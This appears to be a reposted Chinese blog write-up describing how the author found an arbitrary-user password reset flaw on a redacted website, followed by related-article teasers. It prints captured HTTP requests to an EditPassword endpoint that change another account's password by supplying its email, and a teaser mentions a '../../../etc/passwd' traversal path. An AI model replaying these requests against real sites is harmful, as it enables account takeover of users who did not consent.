php mvc漏洞挖掘,一次简单的逻辑漏洞挖掘案例/任意用户密码重置漏洞挖掘过程...

最新推荐文章于 2022-10-03 09:31:26 发布
最新推荐文章于 2022-10-03 09:31:26 发布
阅读量405 收藏 1
点赞数
文章标签: php mvc漏洞挖掘

本帖最后由 小爱_Joker 于 2017-5-27 01:43 编辑

挖掘逻辑漏洞 基本都是前端问题 过滤不严格 导致  熬夜挖漏洞盒子厂商!!

身为一个正在学习挖掘逻辑漏洞的小彩笔来说  首先是找二级 或者三 四级域名 大厂商的话主站 是别想了 当然 很少有主站存在很多漏洞的厂商

挖掘逻辑漏洞 先注册个账户

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527035429.png (429.39 KB, 下载次数: 47)

2017-5-27 03:55 上传

注册完成后 找回密码

找回密码的这里他会提示你验证码不对

邮箱收到的验证码是四位数 懒得爆破了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040550.png (27.01 KB, 下载次数: 48)

2017-5-27 04:05 上传

直接进入主题

前端有个验证 这个管理员做的很不错

换种思路

输入正确的验证码 burp抓包

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040738.png (60.99 KB, 下载次数: 59)

2017-5-27 04:08 上传

go一下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040909.png (60.01 KB, 下载次数: 50)

2017-5-27 04:09 上传

发现返回包回显了true

数据包

[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1

Host: xxxxxxxxx

Content-Length: 36

Accept: */*

Origin: http://xxxx

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://xxxx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1

Connection: close

userId=xxx1588x@qq.com&psd=xxxxxx@

返回包

[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK

Cache-Control: private

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 4.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 26 May 2017 20:01:37 GMT

Connection: close

Content-Length: 4

true

这个时候我又去注册了个用户 因为没有注册限制 前端缺陷 也不用验证码

注册一个用户为[email]888888888888@qq.com[/email]  密码为test888

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527041205.png (199.64 KB, 下载次数: 39)

2017-5-27 04:12 上传

注册成功后

返回burp

发包

修改密码为123456test

[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1

Host: xxxxx

Content-Length: 42

Accept: */*

Origin: [url]http://xxxxxx[/url]

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: [url]http://xxxx/[/url]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1

Connection: close

userId=888888888888@qq.com &psd=123456test

返回包

[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK

Cache-Control: private

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 4.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 26 May 2017 20:12:32 GMT

Connection: close

Content-Length: 4

true

这么来说吧   true 是真正的意思 也就是操作成功的意思

登录验证

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527041439.png (22.72 KB, 下载次数: 44)

2017-5-27 04:14 上传

- - !思路仅供学习 大佬们勿喷。

春容
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MVC.rar_http//mvc.88dsw.cn/_mvc_mvc c++_mvc模式_软件体系结构
09-22
例如,模型可能是一个包含数据和业务逻辑的类,视图可以是继承自特定基类的用户界面组件,控制器则作为事件处理器,连接模型和视图。 **软件体系结构** 软件体系结构是系统的高层次结构或组织形式,它定义了系统的...
MVC.zip_layout index.php?id_mvc
09-23
**MVC(Model-View-Controller)模式**是软件工程中一种广泛采用的设计模式,尤其在Web开发领域,它能够帮助开发者将业务逻辑、数据处理和用户界面有效地分离,提高代码的可维护性和可扩展性。`MVC.zip_layout index...
php mvc漏洞挖掘,Thinkphp3.2.3最新版update注入漏洞(含PoC)
weixin_36288992的博客
03-18 505
简要描述thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其中Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程中在update更新数据的过程中存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。漏洞详情这个问题很早之前就注意到了,只是一直没找到...
一次逻辑漏洞挖掘
weixin_51646864的博客
03-21 1007
漏洞挖掘需要耐心和时间,有时候很久都不会有收获,耐心很重要。有位大佬说过:知识面决定攻击面。所以能不能挖到洞取决于学的够不够多,本人也是刚入门菜鸟,需要多向大佬学习
PHP漏洞挖掘思路+实例
weixin_33950035的博客
03-08 742
lxj616 · 2013/12/27 14:09最近研究PHP漏洞的挖掘,总结了一些我挖到的漏洞,整理了一下思路,求各路神人补充、批评、指导~本文所有示例均来自我在乌云上已由厂商允许公开的漏洞由于是实例的分析,基础知识请百度,就不全都粘贴到前面了0x01:  搜索所有的用户可控变量(GET/POST/COOKIE/referer)原因:所有用户输入都是有害的,代码审计注重函数和变量,先看看在什么...
51.代码审计-PHP框架MVC类上传断点调试挖掘
mingyqf的博客
01-16 561
1.文件上传漏洞挖掘: (1)关键字搜索(函数、键字、全局变量等):比如$_FILES,move_uploades_file等 (2)应该功能抓包:寻找任何可能存在上传的应用功能点,比如前台会员中心,后台新闻添加等。 (3)漏洞举例:逻辑漏洞-先上传文件再判断后缀名,通过MIME类型来判断文件类型、前端校验文件类型而服务端未校验。 2.MVC开发框架类::https://www.cnblogs.com/wsybky/p/8638876.html 3.Thinkphp框架:http://sites.th.
服务器响应http头文件代码,web运行中HTTP报文基础讲解(请求和响应)
weixin_30227565的博客
07-31 303
用户通过浏览器(客户端)向服务端发送一个get请求时:(如下)请求报文头文件:GET /***.aspx HTTP/1.1Referer: 被链接的文档的URLAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1;WOW64; Trident/4.0; SLCC2; .NET CLR...
python128web漏洞挖掘技术的研究(django).rar
最新发布
04-26
Python128web漏洞挖掘技术的研究,主要集中在Django框架的应用和安全性方面。Django是Python最流行的Web开发框架之一,以其高效、安全和可扩展性而受到开发者的青睐。本研究项目旨在深入理解Django的内部工作原理,...
基于python+Django的web漏洞挖掘技术源码数据库.zip
10-06
本项目聚焦于使用Python的Django框架进行Web漏洞挖掘技术的研究与实践,旨在帮助开发者提升对Web安全的认识,以及如何预防和检测潜在的安全问题。 Python是一种高级编程语言,以其简洁、易读的语法而闻名,广泛应用...
blog_jsp.rar_../../../etc/passwd_/etc/passwd_java 博客_java博客_main
09-21
3. **../../../etc/passwd** 和 `/etc/passwd`:这是Linux系统中一个重要的文件,包含了所有用户的信息,如用户名、密码(通常以加密形式存储)、用户ID、组ID等。在Web应用中,如果出现这样的路径,可能意味着存在...
ASP.NET WebApi--概述
不求上进的码农的博客
10-03 2708
你可以将webapi的接口和普通方法一样,返回任意的类型,WebApi会自动序列化你自定义任何返回类型,然后将序列化的值写到响应正文里,状态码统一返回200。} } }Asp.Net Web API基于ASP.NET,又借用了很多ASP.NET MVC的概念,所以很容易被ASP.NET的开发者适应和熟悉。因为它ASP.net MVC太像了:URL路由,HTTP Method特性,模型绑定等等。只是WebAPI比MVC更加轻量级,更加restful。
linux漏洞挖掘nebula,Exploit-Exercises-Nebula
weixin_30830161的博客
05-16 247
这关给了一个Perl写的CGI程序,根据thttpd.conf的配置可知该CGI程序监听的1616端口。在虚拟机畅通的情况下直接通过http://192.168.56.101:1616/index.cgi 访问(192.168.56.101是我自己配置的IP地址,读者需要自己配置)。index.cgi的代码如下:#!/usr/bin/env perluse CGI qw{param};print ...
如何入门漏洞挖掘,以及提高自己的挖掘能力
键盘的起始页
04-09 1257
0x01:前言 大家好我是米斯特团队的一员,我的id香瓜,我们团队在这次i春秋第二次漏洞挖掘大赛中,包揽了前五名,我key表哥一不小心拿了一个第一,导致很多人来加他好友问他,如何修炼漏洞挖掘能力,我今天帮大家解答一下这个疑问,哈哈哈。 漏洞挖掘是安全圈的一个核心之一,但是随着各大厂商安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那...
漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
爱国小白帽
01-15 3175
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
在Windows的cmd窗口中安装 ASP.NET (4.0.30319.0)时出现的错误信息
悟道子HD
05-04 2217
C:\Windows\Microsoft.NET\Framework\v4.0.30319>aspnet_regiis.exe -i Microsoft (R) ASP.NET RegIIS 版本 4.0.30319.0 用于在本地计算机上安装和卸载 ASP.NET 的管理实用工具。 版权所有(C) Microsoft Corporation。保留所有权利。 开始安装 ASP.NET (4.0.30319.0)。 此操作系统版本不支持此选项。管理员应使用“打开或关闭 Windows 功能”对话框
---------HTTP报文解析
Fanbin168的专栏
08-07 2083
//我是一个Post请求,我告诉服务器:我要http://localhost:1538/WebForm1.aspx页面,我支持的httpb版本是1.1 POST http://localhost:1538/WebForm1.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* //告诉服务器我是从哪个页面链接过来的 Refere
php mvc 模式的开发注意事项
dianshe9581的博客
06-13 154
1.控制器中: 如果不涉及到数据库的就在控制器中。 empty($res['code']) ? $this->error($res['msg']) : $this->success($res['msg']); 抛出异常写法: try{ $res = $Scoreflow->doaddscore($post); if(empty($res['co...
检测常见ASP.NET配置安全漏洞
weixin_33725272的博客
09-02 179
看到一篇国外MVP Troy Hunt的文章: 67% of ASP.NET websites have serious configuration related security vulnerabilities,大意是依据他搜集到的统计数字,约67%的ASP.NET网站因配置不当,存在安全风险。 Troy Hunt文章的分析数据来自他所开发的一个简易网站扫瞄服务--ASafaWeb, Aut...
CVE-2014-1806 .NET Remoting Services漏洞浅析
weixin_33832340的博客
03-08 836
cssembly · 2014/11/24 12:020x00 简介Microsoft .NET Remoting是一种分布式处理方式,提供了一种允许对象通过应用程序域与另一对象进行交互的框架。前几天James Forshaw发布了CVE-2014-1806 .NET Remoting Services的漏洞利用程序,花了一些时间对其进行一下简单的调试分析。首先安装包含漏洞的.NET Framew...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值